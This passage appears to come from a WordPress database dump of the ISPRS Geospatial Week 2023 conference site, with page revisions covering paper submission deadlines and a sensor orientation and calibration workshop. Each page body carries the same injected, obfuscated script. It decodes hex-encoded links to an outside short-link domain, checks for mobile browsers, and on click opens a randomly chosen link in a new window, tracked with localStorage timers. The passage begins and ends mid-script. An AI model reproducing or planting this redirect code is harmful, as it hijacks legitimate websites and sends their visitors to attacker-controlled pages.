Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2022-11-25 22:55:36','2022-11-25 22:55:36','',2659,'https://gsw2023.com/?p=3376',0,'revision','',0),
(3377,1,'2022-11-25 22:56:25','2022-11-25 22:56:25','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5>The ISPRS Geospatial Week 2023 submission will be opened for paper submission through the ConfTool: Conference Management Software. Authors will be able to submit either a full paper or an extended abstract to one of the following workshops :</h5>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"22\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<div class=\"three_quarter first\">\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n<div class=\"gap-10\"></div>\n<h3>Paper submissions deadlines</h3>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li><strong>Full paper submission (Annals): March 2023 (hard deadline, no extension)</strong></li>\n<li><strong>Abstract submission (Archives): April 2023 (hard deadline, no extension)</strong></li>\n<li><strong>Abstract author notification: May 2023</strong></li>\n<li><strong>Full paper Author notification: May 2023</strong></li>\n<li><strong>Camera ready paper submission: July 2023</strong></li>\n</ul>\n</li>\n</ul>\n<div class=\"gap-50\"></div>\n<h5 style=\"color: red;\">Useful links:</h5>\n<ul class=\"nospace\">\n<li><a title=\" \" href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\">Guidelines for Authors</a></li>\n<li><a title=\" \" href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">Reviewing process for ISPRS Events</a></li>\n</ul>\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2022-11-25 22:56:25','2022-11-25 22:56:25','',2659,'https://gsw2023.com/?p=3377',0,'revision','',0),
(3378,1,'2022-11-25 22:59:46','2022-11-25 22:59:46','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3267\" img_size=\"617x470\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 style=\"text-align: justify; color: black;\"><strong>This workshop will concern various aspects of the research and implementations focused on the issues of sensor orientation and calibration. It will be an opportunity to present and to know the newest achievements in this scope related to ground-based, airborne and satellite systems. Technology brings new sensors constantly in aerial and satellite photogrammetry and remote sensing. Experimental works about the calibration and orientation of new technological solutions for mapping purposes are essential for worldwide photogrammetric society. The workshop will also be the opportunity to discuss the low-cost solutions used for mapping and navigation purposes. Since they are becoming increasingly popular nowadays, the quality of data collected by them can not be guaranteed without including sensor calibration and proper orientation methods.</strong></h5>\r\n<h5 style=\"text-align: justify; color: black;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023. It will be hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops. Any interested scientists and professionals can apply their submissions related to various remote sensing (optical, lidar, thermal, radar, lidar) and navigational (GNSS devices, IMUs, radar, magnetometers, odometers etc.) sensors collected with any platform to present them with thematic oral and poster sessions.</strong></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1><strong>Chairs</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"59\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5><strong><u>Themes of the event:</u></strong></h5>\r\n<ul>\r\n 	<li><strong>State-of-the-art in orientation approaches of multi-sensor systems</strong></li>\r\n 	<li><strong>New calibration methods of mobile mapping platforms and systems for mapping and navigation purposes</strong></li>\r\n 	<li><strong>Challenges in aerial sensors calibration and orientation</strong></li>\r\n 	<li><strong>Testing new sensors and systems available in the market using the field-based and laboratory approaches</strong></li>\r\n 	<li><strong>Validation of satellite sensors in spectral and spatial quality, including testing micro- and nanosatellites</strong></li>\r\n 	<li><strong>Concepts of test fields for calibration of sensors, including the possibilities for aerial, low-altitude and terrestrial sensors</strong></li>\r\n 	<li><strong>New validation methods and case studies of photogrammetric and lidar sensors mainly referred to low-cost devices (i.e. hand scanners, smartphones)</strong></li>\r\n 	<li><strong>Sensors benchmarking – concepts and examples</strong></li>\r\n</ul>\r\n&nbsp;\r\n<h5><strong><u>Scientific Committee: (to be announced)</u></strong></h5>\r\n<ul>\r\n 	<li><strong>Khrystyna Burshtynska, Lviv Polytechnic National University, Ukraine</strong></li>\r\n 	<li><strong>Michael Cramer, University of Stuttgart, Germany</strong></li>\r\n 	<li><strong>Dorota Iwaszczuk, Technical University of Darmstadt, Germany</strong></li>\r\n 	<li><strong>Zdzisław Kurczyński, Warsaw University of Technology, Poland</strong></li>\r\n 	<li><strong>Jon Mills, Newcastle University, United Kingdom</strong></li>\r\n 	<li><strong>Fabio Remondino, Bruno Kessler Foundation FBK, Italy</strong></li>\r\n 	<li><strong>Jan Skaloud, Swiss Federal Institute of Technology EPFL, Switzerland</strong></li>\r\n 	<li><strong>Guo Zhang, Wuhan University, China</strong></li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return 